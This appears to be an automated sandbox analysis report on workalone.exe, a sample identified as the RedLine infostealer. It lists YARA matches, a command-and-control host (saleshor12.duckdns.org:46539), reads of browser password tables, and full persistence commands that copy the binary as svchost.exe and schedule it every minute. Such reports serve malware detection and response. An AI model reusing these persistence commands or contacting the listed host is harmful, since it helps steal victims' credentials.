Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: saleshor12.duckdns.org:46539Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: saleshor12.duckdns.org

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: workalone.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\workalone.exe	Code function: 1_2_054DDE10	1_2_054DDE10
Source: C:\Users\user\Desktop\workalone.exe	Code function: 1_2_054DD2F0	1_2_054DD2F0
Source: C:\Users\user\Desktop\workalone.exe	Code function: 1_2_065E8440	1_2_065E8440
Source: C:\Users\user\Desktop\workalone.exe	Code function: 1_2_065E8878	1_2_065E8878
Source: C:\Users\user\Desktop\workalone.exe	Code function: 1_2_065E15A8	1_2_065E15A8

Source: C:\Users\user\Desktop\workalone.exe

Code function: 0_2_00F88220 CreateProcessAsUserA,

0_2_00F88220

Source: workalone.exe, 00000000.00000002.267079536.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
Source: workalone.exe, 00000001.00000000.262909550.000000000041A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
Source: workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs workalone.exe
Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs workalone.exe
Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs workalone.exe
Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: #l,\\StringFileInfo\\040904B0\\OriginalFilename vs workalone.exe
Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs workalone.exe
Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXED vs workalone.exe

Source: workalone.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: workalone.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\workalone.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f	Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\workalone.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\workalone.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\workalone.exe

File created: C:\Users\user\AppData\Roaming\svchost

Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE6B7.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/29@5/1

Source: tmp1B45.tmp.1.dr, tmpE6B7.tmp.1.dr, tmpB641.tmp.1.dr, tmpB611.tmp.1.dr, tmp8319.tmp.1.dr, tmp82DA.tmp.1.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: workalone.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\workalone.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6124:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01

Source: workalone.exe, u0087u0003/u0095u0003.cs	Cryptographic APIs: 'CreateDecryptor'
Source: workalone.exe, u0087u0003/u0095u0003.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.7.dr, u0087u0003/u0095u0003.cs	Cryptographic APIs: 'CreateDecryptor'
Source: svchost.exe.7.dr, u0087u0003/u0095u0003.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\Desktop\workalone.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: workalone.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: workalone.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\workalone.exe

Code function: 0_2_00F81C57 push ebx; iretd

0_2_00F81C7A

Source: initial sample	Static PE information: section name: .text entropy: 7.585773646811085
Source: initial sample	Static PE information: section name: .text entropy: 7.585773646811085

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\svchost\svchost.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\svchost\svchost.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 46539
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 46539
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 46539
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 46539
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49688

Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
